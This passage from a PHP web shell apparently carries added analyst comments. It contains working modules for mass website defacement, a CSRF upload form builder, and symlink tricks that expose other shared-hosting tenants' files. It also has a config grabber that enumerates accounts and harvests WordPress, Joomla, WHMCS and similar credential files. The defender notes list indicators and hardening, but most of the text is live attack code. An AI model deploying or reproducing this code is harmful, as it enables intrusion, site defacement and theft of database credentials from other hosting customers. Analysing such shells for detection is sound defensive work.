  // identical modification times; each path written in a sub-directory is also echoed
  // to the operator. The return value assigned to $berandal is never used.
  675. function sabun_massal($dir,$namafile,$isi_script) {
  676. if(is_writable($dir)) {
  677. $dira = scandir($dir);
  678. foreach($dira as $dirb) {
  679. $dirc = "$dir/$dirb";
  680. $lokasi = $dirc.'/'.$namafile;
  681. if($dirb === '.') {
  682. file_put_contents($lokasi, $isi_script);
  683. } elseif($dirb === '..') {
  684. file_put_contents($lokasi, $isi_script);
  685. } else {
  686. if(is_dir($dirc)) {
  687. if(is_writable($dirc)) {
  688. echo "[<font color=cyan>DONE</font>] $lokasi<br>";
  689. file_put_contents($lokasi, $isi_script);
  690. $berandal = sabun_massal($dirc,$namafile,$isi_script);
  691. }
  692. }
  693. }
  694. }
  695. }
  696. }
  // Single-level variant of the defacement writer. When $dir is writable, it writes
  // $isi_script to a file named $namafile in $dir itself, in the parent of $dir
  // (the '.' and '..' entries returned by scandir() are written to, not skipped) and
  // in each writable immediate sub-directory. It does not descend further.
  // file_put_contents() overwrites an existing file of the same name.
  // Incident scoping: the blast radius is $dir, its parent and one level of
  // children; affected files share one name and identical content.
  697. function sabun_biasa($dir,$namafile,$isi_script) {
  698. if(is_writable($dir)) {
  699. $dira = scandir($dir);
  700. foreach($dira as $dirb) {
  701. $dirc = "$dir/$dirb";
  702. $lokasi = $dirc.'/'.$namafile;
  703. if($dirb === '.') {
  704. file_put_contents($lokasi, $isi_script);
  705. } elseif($dirb === '..') {
  706. file_put_contents($lokasi, $isi_script);
  707. } else {
  708. if(is_dir($dirc)) {
  709. if(is_writable($dirc)) {
  710. echo "[<font color=cyan>DONE</font>] $dirb/$namafile<br>";
  711. file_put_contents($lokasi, $isi_script);
  712. }
  713. }
  714. }
  715. }
  716. }
  717. }
  718. if($_POST['start']) {
  719. if($_POST['tipe_sabun'] == 'mahal') {
  720. echo "<div style='margin: 5px auto; padding: 5px'>";
  721. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  722. echo "</div>";
  723. } elseif($_POST['tipe_sabun'] == 'murah') {
  724. echo "<div style='margin: 5px auto; padding: 5px'>";
  725. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  726. echo "</div>";
  727. }
  728. } else {
  729. echo "<center>";
  730. echo "<form method='post'>
  731. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  732. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  733. <font style='text-decoration: underline;'>Folder:</font><br>
  734. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  735. <font style='text-decoration: underline;'>Filename:</font><br>
  736. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  737. <font style='text-decoration: underline;'>Index File:</font><br>
  738. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Mana Ku Tau</textarea><br>
  739. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  740. </form></center>";
  741. }
  742. }
  743. elseif($_GET['do'] == 'loghunter')
  744. {
  745. echo '<center><h1>Log Hunter</h1>';
  746. echo "<form action=\"\" method=\"post\">\n";
  747. ?><br>Dir :<input type="text" value="<?=getcwd();?>" style='border-color=white;' name="shc_dir"><?php
  748. echo "<input type=\"submit\" style='border-color=white;' name=\"submit\" class=\"kotak\" value=\"Scan!\"/>\n";
  749. echo "</form>\n";
  750. echo "<pre style=\"text-align: left;\">\n";
  751. error_reporting(0);
  752. /*
  753. +--------------------------------------------+
  754. Name : Log Hunter (Grab Email)
  755. Date : 26/03/2016 05:53 PM
  756. Link : http://facebook.com/rafi.izudin
  757. Link : http://pastebin.com
  758. Author : Shor7cut
  759. +--------------------------------------------+
  760. Recoder : Berandal
  761. Link : http://twitter.com
  762. Link : http://pastebin.com
  763. +--------------------------------------------+
  764. */
  765.  
  766.  
  767. if($_POST['submit']){
  768. function tampilkan($shcdirs){
  769. foreach(scandir($shcdirs) as $shc)
  770. {
  771. if($shc!='.' && $shc!='..')
  772. {
  773. $shc = $shcdirs.DIRECTORY_SEPARATOR.$shc;
  774. if( !is_dir($shc) && !eregi("css", $shc) ){
  775.  
  776. $fgt = file_get_contents($shc);
  777. $ifgt = exif_read_data($shc);
  778. $jembut = "COMPUTED";
  779. $taik = "UserComment";
  780. $shcm = "/mail['(']/";
  781. if($ifgt[$jembut][$taik]){
  782. echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font><br>";
  783. }
  784. preg_match_all('#[A-Z0-9a-z._%+-]+@[A-Za-z0-9.+-]+#',$fgt,$cocok);
  785. $hcs = "/base64_decode/";
  786. $exif = "/exif_read_data/";
  787. preg_match($shcm, addslashes($fgt), $mailshc);
  788. preg_match($hcs, addslashes($fgt), $shcmar);
  789. preg_match($exif, addslashes($fgt), $shcxif);
  790. if(eregi('HTTP Cookie File', $fgt) || eregi('PHP Warning:', $fgt) ){
  791. }
  792. if(eregi('tmp_name', $fgt)){
  793. echo "[<font color=#FAFF14>Uploader</font>] <font color=#2196F3>".$shc."</font><br>";
  794. }
  795. if($shcmar[0]){
  796. echo "[<font color=#FF3D00>Base64</font>] <font color=#2196F3>".$shc."</font><br>";
  797. }
  798. if($mailshc[0]){
  799. echo "[<font color=#E6004E>MailFunc</font>] <font color=#2196F3>".$shc."</font><br>";
  800. }
  801. if($shcxif[0]){
  802. echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font> </font><font color=red>{Manual Check}</font><br>";
  803. }
  804. if(eregi("js", $shc)){
  805. echo "[<font color=red>Javascript</font>] <font color=#2196F3>".$shc."</font> { <a href=http://www.unphp.net target=_blank>CheckJS</a> }<br>";
  806. }
  807. if($cocok[0]){
  808. foreach ($cocok[0] as $key => $shcmail) {
  809. if (filter_var($shcmail, FILTER_VALIDATE_EMAIL)) {
  810. echo "[<font color=yellow>SendMail</font>] <font color=#2196F3>".$shc."</font> { ".$shcmail." }<br>";
  811. }
  812. }
  813. }
  814.  
  815. }else{
  816. tampilkan($shc);
  817. }
  818. }
  819. }
  820. }
  821. tampilkan($_POST['shc_dir']);
  822. }
  823. echo "</pre>\n";
  824. echo "</Center>\n";}
  825. elseif($_GET['do'] == 'csrf') {
  826. echo "<h1>CSRF Exploiter Online</h1>
  827. <form method='post'>
  828. URL: &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='url' size='50' height='10' placeholder='http://127.0.0.1/[path]/upload.php' style='margin: 5px auto; padding-left: 5px;' required><br>
  829. POST File: <input type='text' name='data' style='border:0;border-bottom:1px solid #292929; width:500px;' size='50' height='10' placeholder='Filedata / files[] / qqfile / userfile / dll' style='margin: 5px auto; padding-left: 5px;' required><br>
  830. <br><input style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' class='kotak' type='submit' name='go' value='Lock!'>
  831. </form>";
  832. $url = $_POST['url'];
  833. $data = $_POST['data'];
  834. $submit = $_POST['go'];
  835. if($submit) {
  836. echo "<br><form style='text-align:left' method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$data'><input style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' type='submit' name='ok' class='kotak' value='Upload'>
  837. </form></div>";
  838. }
  839. ;} elseif($_GET['do'] == 'symlink') {
  // Web-shell module selected by do=symlink. On a shared host it tries to make other
  // accounts' web roots readable through this site: it creates a working directory,
  // places a symlink named "root" that points at "/", and writes an .htaccess that
  // enables directory listings and symlink following and maps .php to text/plain, so
  // PHP sources reached through the link are returned as text instead of being run.
  // Three variants follow, tried in order: /etc/named.conf readable, /etc/passwd
  // readable, or (when $os is not "Windows") a posix_getpwuid() sweep.
  // Defender notes: artefacts named in this branch are the directories ManaKuTau_sym
  // and berandal_sym (both prefixes occur; treat either as an indicator), a symlink
  // "root" -> "/", a temporary test.txt, and an .htaccess containing
  // "AddHandler text/plain .php". Hardening commonly applied against this technique:
  // Options SymLinksIfOwnerMatch instead of FollowSymLinks, an AllowOverride setting
  // that does not let .htaccess change Options or handlers, open_basedir, and
  // disable_functions covering command execution and symlink().
  // $path is set outside this excerpt; $full is that path with the document root
  // removed and is used below as the URL prefix of the generated links.
  840. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  // file() yields the lines of /etc/named.conf, or false (warning silenced by @).
  841. $d0mains = @file("/etc/named.conf");
  842. ##httaces
  // Variant 1: the DNS server configuration is readable.
  843. if($d0mains){
  844. @mkdir("ManaKuTau_sym",0777);
  845. @chdir("ManaKuTau_sym");
  // exe() is defined outside this excerpt; presumably a command-execution wrapper - confirm.
  846. @exe("ln -s / root");
  847. $file3 = 'Options Indexes FollowSymLinks
  848. DirectoryIndex berandal.htm
  849. AddType text/plain .php
  850. AddHandler text/plain .php
  851. Satisfy Any';
  // The .htaccess is written into the current directory (ManaKuTau_sym after the chdir).
  // NOTE(review): the fopen() result is not checked before fwrite().
  852. $fp3 = fopen('.htaccess','w');
  853. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  854. echo "<center><h2>Symlink Server</h2></center>
  855. <table align=center border=1 style='width:60%;border-color:#333333;'>
  856. <tr>
  857. <td align=center><font size=2>No.</font></td>
  858. <td align=center><font size=2>Domains</font></td>
  859. <td align=center><font size=2>Users</font></td>
  860. <td align=center><font size=2>Symlink</font></td>
  861. </tr>";
  862. $dcount = 1;
  // One table row per named.conf line that contains "zone" and yields a name longer
  // than two characters.
  863. foreach($d0mains as $d0main){
  // NOTE(review): eregi() was removed in PHP 7, so this variant only runs on PHP 5.x.
  864. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  865. flush();
  866. if(strlen(trim($domains[1][0])) > 2){
  // The owner of /etc/valiases/<zone> is resolved to an account record; its 'name'
  // field is used as the account name in the link below.
  867. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  868. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  869. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  870. <td>".$user['name']."</td>
  871. <td><a href='$full/ManaKuTau_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  872. flush();
  873. $dcount++;}}}
  874. echo "</table>";
  875. }else{
  // Variant 2: named.conf was not readable, fall back to /etc/passwd.
  876. $TEST=@file('/etc/passwd');
  877. if ($TEST){
  878. @mkdir("ManaKuTau_sym",0777);
  879. @chdir("ManaKuTau_sym");
  880. exe("ln -s / root");
  881. $file3 = 'Options Indexes FollowSymLinks
  882. DirectoryIndex berandal.htm
  883. AddType text/plain .php
  884. AddHandler text/plain .php
  885. Satisfy Any';
  886. $fp3 = fopen('.htaccess','w');
  887. $fw3 = fwrite($fp3,$file3);
  888. @fclose($fp3);
  889. echo "
  890. <table align=center border=1><tr>
  891. <td align=center><font size=3>S. No.</font></td>
  892. <td align=center><font size=3>Users</font></td>
  893. <td align=center><font size=3>Symlink</font></td></tr>";
  894. $dcount = 1;
  895. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  896. while(!feof($file)){
  897. $s = fgets($file);
  898. $matches = array();
  // The pattern captures the text between the first "/" on the line and the next ":/",
  // which for a passwd line is the home-directory field without its leading slash.
  899. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  // $matches is reused: from here on it is a string, the home path with "home/" removed.
  900. $matches = str_replace("home/","",$matches[1]);
  // Skip empty results, results longer than 12 characters, and the listed system directories.
  901. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  902. continue;
  903. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  904. <td align=center><font class=txt>" . $matches . "</td>";
  905. echo "<td align=center><font class=txt><a href=$full/berandal_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  906. $dcount++;}fclose($file);
  // Variant 3 starts on the next line, after the table is closed: neither file was
  // readable and $os (set outside this excerpt) is not "Windows". The .htaccess written
  // here names 69.htm as DirectoryIndex instead of berandal.htm.
  907. echo "</table>";}else{if($os != "Windows"){@mkdir("berandal_sym",0777);@chdir("ManaKuTau_sym");@exe("ln -s / root");$file3 = '
  908. Options Indexes FollowSymLinks
  909. DirectoryIndex 69.htm
  910. AddType text/plain .php
  911. AddHandler text/plain .php
  912. Satisfy Any
  913. ';
  914. $fp3 = fopen('.htaccess','w');
  915. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  916. echo "
  917. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  918. <table align=center border=1><tr>
  919. <td align=center><font size=3>ID</font></td>
  920. <td align=center><font size=3>Users</font></td>
  921. <td align=center><font size=3>Symlink</font></td></tr>";
  // Account enumeration without reading /etc/passwd: every uid from 0 to 1000 is looked
  // up with posix_getpwuid() and each hit is joined with ':' into one line of $temp.
  922. $temp = "";$val1 = 0;$val2 = 1000;
  923. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  924. if ($uid)$temp .= join(':',$uid)."\n";}
  // The collected lines are written to test.txt in the current directory, read back
  // line by line with the same parsing as variant 2, and the file is unlinked at the end.
  925. echo '<br/>';$temp = trim($temp);$file5 =
  926. fopen("test.txt","w");
  927. fputs($file5,$temp);
  928. fclose($file5);$dcount = 1;$file =
  929. fopen("test.txt", "r") or exit("Unable to open file!");
  930. while(!feof($file)){$s = fgets($file);$matches = array();
  931. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  932. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  933. continue;
  934. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  935. <td align=center><font class=txt>" . $matches . "</td>";
  936. echo "<td align=center><font class=txt><a href=$full/ManaKuTau_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  937. $dcount++;}
  938. fclose($file);
  939. echo "</table></div></center>";unlink("test.txt");
  // Reached when $os equals "Windows": nothing is created, only the message is printed.
  940. } else
  941. echo "<center><font size=3>Cannot create Symlink</font></center>";
  942. }
  943. }
  944. } elseif($_GET['config'] == 'grabber') {
  // Web-shell module selected by config=grabber. Working from a passwd-style account
  // list posted in the 'passwd' field, it tries to collect other tenants' application
  // configuration files (the files that hold database credentials), either by copying
  // their contents or by symlinking them into a directory under this site.
  // The POST field 'config' picks the mode: symvhosts, symlink, 404 or grab.
  // Defender notes: directory names used by this branch are ManaKuTau_symvhosts,
  // ManaKuTau_symconfig, ManaKuTau_sym404 and ManaKuTau_config, plus the same names
  // with the berandal_ prefix; collected files are named <account>-<application>.txt.
  // The technique depends on one account's PHP process being able to read or link to
  // another account's files, so owner-only permissions on config files, a separate
  // process user per account, open_basedir, and disable_functions covering symlink()
  // and the command-execution functions are the controls it runs into.
  // The message below is Indonesian for "cannot be used on a Windows server".
  945. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  946. echo '<script>alert("Tidak bisa di gunakan di server windows")</script>';
  947. exit;
  948. }
  // Everything down to the matching else runs only when the request has a POST body.
  // Mode symvhosts: links "/" into a new directory and writes the same text/plain
  // .htaccess as the symlink module.
  949. if($_POST){ if($_POST['config'] == 'symvhosts') {
  950. @mkdir("ManaKuTau_symvhosts", 0777);
  // exe() is defined outside this excerpt; presumably a command-execution wrapper - confirm.
  951. exe("ln -s / ManaKuTau_symvhosts/root");
  952. $htaccess="Options Indexes FollowSymLinks
  953. DirectoryIndex 69.htm
  954. AddType text/plain .php
  955. AddHandler text/plain .php
  956. Satisfy Any";
  957. @file_put_contents("ManaKuTau_symvhosts/.htaccess",$htaccess);
  // The posted text is split into lines and each line into colon-separated fields;
  // index 5 is taken as the home directory.
  958. $etc_passwd=$_POST['passwd'];
  959.  
  960. $etc_passwd=explode("\n",$etc_passwd);
  961. foreach($etc_passwd as $passwd){
  962. $pawd=explode(":",$passwd);
  963. $user =$pawd[5];
  // $jembod is the home path with "/var/www/vhosts/" removed; it is used in the link names.
  964. $jembod = preg_replace('/\/var\/www\/vhosts\//', '', $user);
  // Only entries whose home path contains "vhosts" are processed.
  // NOTE(review): $user and $jembod come from the POST body and are concatenated into
  // the command strings below without escapeshellarg().
  965. if (preg_match('/vhosts/i',$user)){
  966. exe("ln -s ".$user."/httpdocs/wp-config.php berandal_symvhosts/".$jembod."-Wordpress.txt");
  967. exe("ln -s ".$user."/httpdocs/configuration.php berandal_symvhosts/".$jembod."-Joomla.txt");
  968. exe("ln -s ".$user."/httpdocs/config/koneksi.php berandal_symvhosts/".$jembod."-Lokomedia.txt");
  969. exe("ln -s ".$user."/httpdocs/forum/config.php berandal_symvhosts/".$jembod."-phpBB.txt");
  970. exe("ln -s ".$user."/httpdocs/sites/default/settings.php berandal_symvhosts/".$jembod."-Drupal.txt");
  971. exe("ln -s ".$user."/httpdocs/config/settings.inc.php berandal_symvhosts/".$jembod."-PrestaShop.txt");
  972. exe("ln -s ".$user."/httpdocs/app/etc/local.xml berandal_symvhosts/".$jembod."-Magento.txt");
  973. exe("ln -s ".$user."/httpdocs/admin/config.php berandal_symvhosts/".$jembod."-OpenCart.txt");
  974. exe("ln -s ".$user."/httpdocs/application/config/database.php berandal_symvhosts/".$jembod."-Ellislab.txt");
  975. }}}
  // Mode symlink: prepares the directory and .htaccess; the per-file links are made in
  // the loop further down. Uses PHP's symlink() rather than a shell command.
  976. if($_POST['config'] == 'symlink') {
  977. @mkdir("ManaKuTau_symconfig", 0777);
  978. @symlink("/","berandal_symconfig/root");
  979. $htaccess="Options Indexes FollowSymLinks
  980. DirectoryIndex 69.htm
  981. AddType text/plain .php
  982. AddHandler text/plain .php
  983. Satisfy Any";
  984. @file_put_contents("ManaKuTau_symconfig/.htaccess",$htaccess);}
  // Mode 404: same preparation, with an .htaccess that additionally sets index options,
  // hides *.txt404 entries from listings and adds a rewrite rule for .txt requests.
  985. if($_POST['config'] == '404') {
  986. @mkdir("ManaKuTau_sym404", 0777);
  987. @symlink("/","ManaKuTau_sym404/root");
  988. $htaccess="Options Indexes FollowSymLinks
  989. DirectoryIndex 69.htm
  990. AddType text/plain .php
  991. AddHandler text/plain .php
  992. Satisfy Any
  993. IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*
  994. IndexIgnore *.txt404
  995. RewriteEngine On
  996. RewriteCond %{REQUEST_FILENAME} ^.*berandal_sym404 [NC]
  997. RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]";
  998. @file_put_contents("ManaKuTau_sym404/.htaccess",$htaccess);
  999. }
  // Mode grab: prepares an output directory and an .htaccess for the copied files.
  // NOTE(review): neither the mkdir() nor the fopen() result is checked, and the
  // handle is never closed explicitly.
  1000. if($_POST['config'] == 'grab') {
  1001. mkdir("ManaKuTau_config", 0777);
  1002. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  1003. $htc = fopen("berandal_config/.htaccess","w");
  1004. fwrite($htc, $isi_htc);
  1005. }
  // Account names are whatever precedes ":x:" on each line of the posted text.
  1006. $passwd = $_POST['passwd'];
  1007.  
  1008. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1009. foreach($user_config[1] as $user_berandal) {
  // The map assigned next pairs candidate file paths under /home/<account>/ with an
  // application label; the label becomes part of the output file name.
  1010. $grab_config = array(
  1011. "/home/$user_berandal/.accesshash" => "WHM-accesshash",
  1012. "/home/$user_berandal/public_html/config/koneksi.php" => "Lokomedia",
  1013. "/home/$user_berandal/public_html/forum/config.php" => "phpBB",
  1014. "/home/$user_berandal/public_html/sites/default/settings.php" => "Drupal",
  1015. "/home/$user_berandal/public_html/config/settings.inc.php" => "PrestaShop",
  1016. "/home/$user_berandal/public_html/app/etc/local.xml" => "Magento",
  1017. "/home/$user_berandal/public_html/admin/config.php" => "OpenCart",
  1018. "/home/$user_berandal/public_html/application/config/database.php" => "Ellislab",
  1019. "/home/$user_berandal/public_html/vb/includes/config.php" => "Vbulletin",
  1020. "/home/$user_berandal/public_html/includes/config.php" => "Vbulletin",
  1021. "/home/$user_berandal/public_html/forum/includes/config.php" => "Vbulletin",
  1022. "/home/$user_berandal/public_html/forums/includes/config.php" => "Vbulletin",
  1023. "/home/$user_berandal/public_html/cc/includes/config.php" => "Vbulletin",
  1024. "/home/$user_berandal/public_html/inc/config.php" => "MyBB",
  1025. "/home/$user_berandal/public_html/includes/configure.php" => "OsCommerce",
  1026. "/home/$user_berandal/public_html/shop/includes/configure.php" => "OsCommerce",
  1027. "/home/$user_berandal/public_html/os/includes/configure.php" => "OsCommerce",
  1028. "/home/$user_berandal/public_html/oscom/includes/configure.php" => "OsCommerce",
  1029. "/home/$user_berandal/public_html/products/includes/configure.php" => "OsCommerce",
  1030. "/home/$user_berandal/public_html/cart/includes/configure.php" => "OsCommerce",
  1031. "/home/$user_berandal/public_html/inc/conf_global.php" => "IPB",
  1032. "/home/$user_berandal/public_html/wp-config.php" => "Wordpress",
  1033. "/home/$user_berandal/public_html/wp/test/wp-config.php" => "Wordpress",
  1034. "/home/$user_berandal/public_html/blog/wp-config.php" => "Wordpress",
  1035. "/home/$user_berandal/public_html/beta/wp-config.php" => "Wordpress",
  1036. "/home/$user_berandal/public_html/portal/wp-config.php" => "Wordpress",
  1037. "/home/$user_berandal/public_html/site/wp-config.php" => "Wordpress",
  1038. "/home/$user_berandal/public_html/wp/wp-config.php" => "Wordpress",
  1039. "/home/$user_berandal/public_html/WP/wp-config.php" => "Wordpress",
  1040. "/home/$user_berandal/public_html/news/wp-config.php" => "Wordpress",
  1041. "/home/$user_berandal/public_html/wordpress/wp-config.php" => "Wordpress",
  1042. "/home/$user_berandal/public_html/test/wp-config.php" => "Wordpress",
  1043. "/home/$user_berandal/public_html/demo/wp-config.php" => "Wordpress",
  1044. "/home/$user_berandal/public_html/home/wp-config.php" => "Wordpress",
  1045. "/home/$user_berandal/public_html/v1/wp-config.php" => "Wordpress",
  1046. "/home/$user_berandal/public_html/v2/wp-config.php" => "Wordpress",
  1047. "/home/$user_berandal/public_html/press/wp-config.php" => "Wordpress",
  1048. "/home/$user_berandal/public_html/new/wp-config.php" => "Wordpress",
  1049. "/home/$user_berandal/public_html/blogs/wp-config.php" => "Wordpress",
  1050. "/home/$user_berandal/public_html/configuration.php" => "Joomla",
  1051. "/home/$user_berandal/public_html/blog/configuration.php" => "Joomla",
  1052. "/home/$user_berandal/public_html/submitticket.php" => "^WHMCS",
  1053. "/home/$user_berandal/public_html/cms/configuration.php" => "Joomla",
  1054. "/home/$user_berandal/public_html/beta/configuration.php" => "Joomla",
  1055. "/home/$user_berandal/public_html/portal/configuration.php" => "Joomla",
  1056. "/home/$user_berandal/public_html/site/configuration.php" => "Joomla",
  1057. "/home/$user_berandal/public_html/main/configuration.php" => "Joomla",
  1058. "/home/$user_berandal/public_html/home/configuration.php" => "Joomla",
  1059. "/home/$user_berandal/public_html/demo/configuration.php" => "Joomla",
  1060. "/home/$user_berandal/public_html/test/configuration.php" => "Joomla",
  1061. "/home/$user_berandal/public_html/v1/configuration.php" => "Joomla",
  1062. "/home/$user_berandal/public_html/v2/configuration.php" => "Joomla",
  1063. "/home/$user_berandal/public_html/joomla/configuration.php" => "Joomla",
  1064. "/home/$user_berandal/public_html/new/configuration.php" => "Joomla",
  1065. "/home/$user_berandal/public_html/WHMCS/submitticket.php" => "WHMCS",
  1066. "/home/$user_berandal/public_html/whmcs1/submitticket.php" => "WHMCS",
  1067. "/home/$user_berandal/public_html/Whmcs/submitticket.php" => "WHMCS",
  1068. "/home/$user_berandal/public_html/whmcs/submitticket.php" => "WHMCS",
  1069. "/home/$user_berandal/public_html/whmcs/submitticket.php" => "WHMCS",
  1070. "/home/$user_berandal/public_html/WHMC/submitticket.php" => "WHMCS",
  1071. "/home/$user_berandal/public_html/Whmc/submitticket.php" => "WHMCS",
  1072. "/home/$user_berandal/public_html/whmc/submitticket.php" => "WHMCS",
  1073. "/home/$user_berandal/public_html/WHM/submitticket.php" => "WHMCS",
  1074. "/home/$user_berandal/public_html/Whm/submitticket.php" => "WHMCS",
  1075. "/home/$user_berandal/public_html/whm/submitticket.php" => "WHMCS",
  1076. "/home/$user_berandal/public_html/HOST/submitticket.php" => "WHMCS",
  1077. "/home/$user_berandal/public_html/Host/submitticket.php" => "WHMCS",
  1078. "/home/$user_berandal/public_html/host/submitticket.php" => "WHMCS",
  1079. "/home/$user_berandal/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  1080. "/home/$user_berandal/public_html/Supportes/submitticket.php" => "WHMCS",
  1081. "/home/$user_berandal/public_html/supportes/submitticket.php" => "WHMCS",
  1082. "/home/$user_berandal/public_html/domains/submitticket.php" => "WHMCS",
  1083. "/home/$user_berandal/public_html/domain/submitticket.php" => "WHMCS",
  1084. "/home/$user_berandal/public_html/Hosting/submitticket.php" => "WHMCS",
  1085. "/home/$user_berandal/public_html/HOSTING/submitticket.php" => "WHMCS",
  1086. "/home/$user_berandal/public_html/hosting/submitticket.php" => "WHMCS",
  1087. "/home/$user_berandal/public_html/CART/submitticket.php" => "WHMCS",
  1088. "/home/$user_berandal/public_html/Cart/submitticket.php" => "WHMCS",
  1089. "/home/$user_berandal/public_html/cart/submitticket.php" => "WHMCS",
  1090. "/home/$user_berandal/public_html/ORDER/submitticket.php" => "WHMCS",
  1091. "/home/$user_berandal/public_html/Order/submitticket.php" => "WHMCS",
  1092. "/home/$user_berandal/public_html/order/submitticket.php" => "WHMCS",
  1093. "/home/$user_berandal/public_html/CLIENT/submitticket.php" => "WHMCS",
  1094. "/home/$user_berandal/public_html/Client/submitticket.php" => "WHMCS",
  1095. "/home/$user_berandal/public_html/client/submitticket.php" => "WHMCS",
  1096. "/home/$user_berandal/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  1097. "/home/$user_berandal/public_html/Clientarea/submitticket.php" => "WHMCS",
  1098. "/home/$user_berandal/public_html/clientarea/submitticket.php" => "WHMCS",
  1099. "/home/$user_berandal/public_html/SUPPORT/submitticket.php" => "WHMCS",
  1100. "/home/$user_berandal/public_html/Support/submitticket.php" => "WHMCS",
  1101. "/home/$user_berandal/public_html/support/submitticket.php" => "WHMCS",
  1102. "/home/$user_berandal/public_html/BILLING/submitticket.php" => "WHMCS",
  1103. "/home/$user_berandal/public_html/Billing/submitticket.php" => "WHMCS",
  1104. "/home/$user_berandal/public_html/billing/submitticket.php" => "WHMCS",
  1105. "/home/$user_berandal/public_html/BUY/submitticket.php" => "WHMCS",
  1106. "/home/$user_berandal/public_html/Buy/submitticket.php" => "WHMCS",
  1107. "/home/$user_berandal/public_html/buy/submitticket.php" => "WHMCS",
  1108. "/home/$user_berandal/public_html/MANAGE/submitticket.php" => "WHMCS",
  1109. "/home/$user_berandal/public_html/Manage/submitticket.php" => "WHMCS",
  1110. "/home/$user_berandal/public_html/manage/submitticket.php" => "WHMCS",
  1111. "/home/$user_berandal/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1112. "/home/$user_berandal/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1113. "/home/$user_berandal/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1114. "/home/$user_berandal/public_html/clientsupport/submitticket.php" => "WHMCS",
  1115. "/home/$user_berandal/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1116. "/home/$user_berandal/public_html/Checkout/submitticket.php" => "WHMCS",
  1117. "/home/$user_berandal/public_html/checkout/submitticket.php" => "WHMCS",
  1118. "/home/$user_berandal/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1119. "/home/$user_berandal/public_html/Billings/submitticket.php" => "WHMCS",
  1120. "/home/$user_berandal/public_html/billings/submitticket.php" => "WHMCS",
  1121. "/home/$user_berandal/public_html/BASKET/submitticket.php" => "WHMCS",
  1122. "/home/$user_berandal/public_html/Basket/submitticket.php" => "WHMCS",
  1123. "/home/$user_berandal/public_html/basket/submitticket.php" => "WHMCS",
  1124. "/home/$user_berandal/public_html/SECURE/submitticket.php" => "WHMCS",
  1125. "/home/$user_berandal/public_html/Secure/submitticket.php" => "WHMCS",
  1126. "/home/$user_berandal/public_html/secure/submitticket.php" => "WHMCS",
  1127. "/home/$user_berandal/public_html/SALES/submitticket.php" => "WHMCS",
  1128. "/home/$user_berandal/public_html/Sales/submitticket.php" => "WHMCS",
  1129. "/home/$user_berandal/public_html/sales/submitticket.php" => "WHMCS",
  1130. "/home/$user_berandal/public_html/BILL/submitticket.php" => "WHMCS",
  1131. "/home/$user_berandal/public_html/Bill/submitticket.php" => "WHMCS",
  1132. "/home/$user_berandal/public_html/bill/submitticket.php" => "WHMCS",
  1133. "/home/$user_berandal/public_html/PURCHASE/submitticket.php" => "WHMCS",
  1134. "/home/$user_berandal/public_html/Purchase/submitticket.php" => "WHMCS",
  1135. "/home/$user_berandal/public_html/purchase/submitticket.php" => "WHMCS",
  1136. "/home/$user_berandal/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1137. "/home/$user_berandal/public_html/Account/submitticket.php" => "WHMCS",
  1138. "/home/$user_berandal/public_html/account/submitticket.php" => "WHMCS",
